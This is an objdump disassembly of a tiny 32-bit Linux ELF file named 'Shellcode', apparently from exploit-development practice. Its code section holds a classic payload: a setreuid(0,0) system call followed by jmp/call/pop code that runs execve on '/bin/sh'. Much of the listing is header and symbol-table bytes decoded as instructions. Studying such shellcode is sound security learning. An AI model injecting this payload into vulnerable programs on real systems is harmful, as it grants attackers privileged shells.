
src/Shellcode:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:	7f 45                	jg     0x47
   2:	4c                   	dec    %esp
   3:	46                   	inc    %esi
   4:	01 01                	add    %eax,(%ecx)
   6:	01 00                	add    %eax,(%eax)
	...
  10:	02 00                	add    (%eax),%al
  12:	03 00                	add    (%eax),%eax
  14:	01 00                	add    %eax,(%eax)
  16:	00 00                	add    %al,(%eax)
  18:	54                   	push   %esp
  19:	90                   	nop
  1a:	04 08                	add    $0x8,%al
  1c:	34 00                	xor    $0x0,%al
  1e:	00 00                	add    %al,(%eax)
  20:	a8 00                	test   $0x0,%al
  22:	00 00                	add    %al,(%eax)
  24:	00 00                	add    %al,(%eax)
  26:	00 00                	add    %al,(%eax)
  28:	34 00                	xor    $0x0,%al
  2a:	20 00                	and    %al,(%eax)
  2c:	01 00                	add    %eax,(%eax)
  2e:	28 00                	sub    %al,(%eax)
  30:	05 00 02 00 01       	add    $0x1000200,%eax
	...
  3d:	90                   	nop
  3e:	04 08                	add    $0x8,%al
  40:	00 90 04 08 84 00    	add    %dl,0x840804(%eax)
  46:	00 00                	add    %al,(%eax)
  48:	84 00                	test   %al,(%eax)
  4a:	00 00                	add    %al,(%eax)
  4c:	06                   	push   %es
  4d:	00 00                	add    %al,(%eax)
  4f:	00 00                	add    %al,(%eax)
  51:	10 00                	adc    %al,(%eax)
  53:	00 31                	add    %dh,(%ecx)
  55:	c0                   	(bad)  
  56:	b0 46                	mov    $0x46,%al
  58:	31 db                	xor    %ebx,%ebx
  5a:	31 c9                	xor    %ecx,%ecx
  5c:	cd 80                	int    $0x80
  5e:	eb 18                	jmp    0x78
  60:	59                   	pop    %ecx
  61:	31 c0                	xor    %eax,%eax
  63:	88 41 07             	mov    %al,0x7(%ecx)
  66:	89 49 08             	mov    %ecx,0x8(%ecx)
  69:	89 41 0c             	mov    %eax,0xc(%ecx)
  6c:	b0 0b                	mov    $0xb,%al
  6e:	8d 19                	lea    (%ecx),%ebx
  70:	8d 51 0c             	lea    0xc(%ecx),%edx
  73:	8d 49 08             	lea    0x8(%ecx),%ecx
  76:	cd 80                	int    $0x80
  78:	e8 e3 ff ff ff       	call   0x60
  7d:	2f                   	das    
  7e:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  81:	2f                   	das    
  82:	73 68                	jae    0xec
  84:	00 2e                	add    %ch,(%esi)
  86:	73 79                	jae    0x101
  88:	6d                   	insl   (%dx),%es:(%edi)
  89:	74 61                	je     0xec
  8b:	62 00                	bound  %eax,(%eax)
  8d:	2e 73 74             	jae,pn 0x104
  90:	72 74                	jb     0x106
  92:	61                   	popa   
  93:	62 00                	bound  %eax,(%eax)
  95:	2e 73 68             	jae,pn 0x100
  98:	73 74                	jae    0x10e
  9a:	72 74                	jb     0x110
  9c:	61                   	popa   
  9d:	62 00                	bound  %eax,(%eax)
  9f:	77 74                	ja     0x115
  a1:	65                   	gs
  a2:	78 74                	js     0x118
	...
  d0:	1b 00                	sbb    (%eax),%eax
  d2:	00 00                	add    %al,(%eax)
  d4:	01 00                	add    %eax,(%eax)
  d6:	00 00                	add    %al,(%eax)
  d8:	03 00                	add    (%eax),%eax
  da:	00 00                	add    %al,(%eax)
  dc:	54                   	push   %esp
  dd:	90                   	nop
  de:	04 08                	add    $0x8,%al
  e0:	54                   	push   %esp
  e1:	00 00                	add    %al,(%eax)
  e3:	00 30                	add    %dh,(%eax)
	...
  ed:	00 00                	add    %al,(%eax)
  ef:	00 01                	add    %al,(%ecx)
  f1:	00 00                	add    %al,(%eax)
  f3:	00 00                	add    %al,(%eax)
  f5:	00 00                	add    %al,(%eax)
  f7:	00 11                	add    %dl,(%ecx)
  f9:	00 00                	add    %al,(%eax)
  fb:	00 03                	add    %al,(%ebx)
	...
 105:	00 00                	add    %al,(%eax)
 107:	00 84 00 00 00 21 00 	add    %al,0x210000(%eax,%eax,1)
	...
 116:	00 00                	add    %al,(%eax)
 118:	01 00                	add    %eax,(%eax)
 11a:	00 00                	add    %al,(%eax)
 11c:	00 00                	add    %al,(%eax)
 11e:	00 00                	add    %al,(%eax)
 120:	01 00                	add    %eax,(%eax)
 122:	00 00                	add    %al,(%eax)
 124:	02 00                	add    (%eax),%al
	...
 12e:	00 00                	add    %al,(%eax)
 130:	70 01                	jo     0x133
 132:	00 00                	add    %al,(%eax)
 134:	a0 00 00 00 04       	mov    0x4000000,%al
 139:	00 00                	add    %al,(%eax)
 13b:	00 06                	add    %al,(%esi)
 13d:	00 00                	add    %al,(%eax)
 13f:	00 04 00             	add    %al,(%eax,%eax,1)
 142:	00 00                	add    %al,(%eax)
 144:	10 00                	adc    %al,(%eax)
 146:	00 00                	add    %al,(%eax)
 148:	09 00                	or     %eax,(%eax)
 14a:	00 00                	add    %al,(%eax)
 14c:	03 00                	add    (%eax),%eax
	...
 156:	00 00                	add    %al,(%eax)
 158:	10 02                	adc    %al,(%edx)
 15a:	00 00                	add    %al,(%eax)
 15c:	3f                   	aas    
	...
 165:	00 00                	add    %al,(%eax)
 167:	00 01                	add    %al,(%ecx)
	...
 181:	00 00                	add    %al,(%eax)
 183:	00 54 90 04          	add    %dl,0x4(%eax,%edx,4)
 187:	08 00                	or     %al,(%eax)
 189:	00 00                	add    %al,(%eax)
 18b:	00 03                	add    %al,(%ebx)
 18d:	00 01                	add    %al,(%ecx)
 18f:	00 01                	add    %al,(%ecx)
	...
 199:	00 00                	add    %al,(%eax)
 19b:	00 04 00             	add    %al,(%eax,%eax,1)
 19e:	f1                   	icebp  
 19f:	ff 0f                	decl   (%edi)
 1a1:	00 00                	add    %al,(%eax)
 1a3:	00 60 90             	add    %ah,-0x70(%eax)
 1a6:	04 08                	add    $0x8,%al
 1a8:	00 00                	add    %al,(%eax)
 1aa:	00 00                	add    %al,(%eax)
 1ac:	00 00                	add    %al,(%eax)
 1ae:	01 00                	add    %eax,(%eax)
 1b0:	19 00                	sbb    %eax,(%eax)
 1b2:	00 00                	add    %al,(%eax)
 1b4:	78 90                	js     0x146
 1b6:	04 08                	add    $0x8,%al
 1b8:	00 00                	add    %al,(%eax)
 1ba:	00 00                	add    %al,(%eax)
 1bc:	00 00                	add    %al,(%eax)
 1be:	01 00                	add    %eax,(%eax)
	...
 1cc:	04 00                	add    $0x0,%al
 1ce:	f1                   	icebp  
 1cf:	ff 20                	jmp    *(%eax)
 1d1:	00 00                	add    %al,(%eax)
 1d3:	00 54 90 04          	add    %dl,0x4(%eax,%edx,4)
 1d7:	08 00                	or     %al,(%eax)
 1d9:	00 00                	add    %al,(%eax)
 1db:	00 10                	add    %dl,(%eax)
 1dd:	00 01                	add    %al,(%ecx)
 1df:	00 27                	add    %ah,(%edi)
 1e1:	00 00                	add    %al,(%eax)
 1e3:	00 84 90 04 08 00 00 	add    %al,0x804(%eax,%edx,4)
 1ea:	00 00                	add    %al,(%eax)
 1ec:	10 00                	adc    %al,(%eax)
 1ee:	01 00                	add    %eax,(%eax)
 1f0:	33 00                	xor    (%eax),%eax
 1f2:	00 00                	add    %al,(%eax)
 1f4:	84 90 04 08 00 00    	test   %dl,0x804(%eax)
 1fa:	00 00                	add    %al,(%eax)
 1fc:	10 00                	adc    %al,(%eax)
 1fe:	01 00                	add    %eax,(%eax)
 200:	3a 00                	cmp    (%eax),%al
 202:	00 00                	add    %al,(%eax)
 204:	84 90 04 08 00 00    	test   %dl,0x804(%eax)
 20a:	00 00                	add    %al,(%eax)
 20c:	10 00                	adc    %al,(%eax)
 20e:	01 00                	add    %eax,(%eax)
 210:	00 53 68             	add    %dl,0x68(%ebx)
 213:	65                   	gs
 214:	6c                   	insb   (%dx),%es:(%edi)
 215:	6c                   	insb   (%dx),%es:(%edi)
 216:	63 6f 64             	arpl   %bp,0x64(%edi)
 219:	65                   	gs
 21a:	2e                   	cs
 21b:	61                   	popa   
 21c:	73 6d                	jae    0x28b
 21e:	00 73 68             	add    %dh,0x68(%ebx)
 221:	65                   	gs
 222:	6c                   	insb   (%dx),%es:(%edi)
 223:	6c                   	insb   (%dx),%es:(%edi)
 224:	63 6f 64             	arpl   %bp,0x64(%edi)
 227:	65 00 6d 79          	add    %ch,%gs:0x79(%ebp)
 22b:	63 61 6c             	arpl   %sp,0x6c(%ecx)
 22e:	6c                   	insb   (%dx),%es:(%edi)
 22f:	00 5f 73             	add    %bl,0x73(%edi)
 232:	74 61                	je     0x295
 234:	72 74                	jb     0x2aa
 236:	00 5f 5f             	add    %bl,0x5f(%edi)
 239:	62 73 73             	bound  %esi,0x73(%ebx)
 23c:	5f                   	pop    %edi
 23d:	73 74                	jae    0x2b3
 23f:	61                   	popa   
 240:	72 74                	jb     0x2b6
 242:	00 5f 65             	add    %bl,0x65(%edi)
 245:	64                   	fs
 246:	61                   	popa   
 247:	74 61                	je     0x2aa
 249:	00 5f 65             	add    %bl,0x65(%edi)
 24c:	6e                   	outsb  %ds:(%esi),(%dx)
 24d:	64                   	fs
	...
